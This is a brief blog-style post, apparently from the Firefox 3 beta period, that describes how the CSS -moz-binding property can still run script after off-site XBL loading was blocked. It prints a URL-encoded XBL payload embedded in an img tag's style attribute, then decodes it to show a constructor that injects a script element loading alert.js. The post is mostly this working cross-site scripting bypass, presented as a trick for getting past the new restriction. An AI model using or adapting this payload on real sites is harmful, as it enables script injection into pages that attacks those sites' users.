Well, I decided to play around a little with Firefox 3 Beta 3 today and discovered that it looks like the ever popular -moz-binding css attribute is now rendered a little less useful. It is now impossible to load off-site XBL via this method.
However, all is not lost. For in patching one of the biggest holes in Firefox's security model, the infinite wisdom of the FF devs is that it is now possible to embed a -moz-binding URL tag inline, like this:
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22
http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js
%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20
document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/
binding%3E%3C/bindings%3E)" />
Using this method provides for no use of a fragment identifier, indeed it is only possible to use the first element. The above XBL decodes to:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="loader">
<implementation>
<constructor>
<![CDATA[
var url = "alert.js";
var scr = document.createElement("script");
scr.setAttribute("src",url);
var bodyElement = document.getElementsByTagName("html").item(0);
bodyElement.appendChild(scr);]]>
</constructor>
</implementation>
</binding>
</bindings>
which essentially creates a nice new DOM script element that loads alert.js.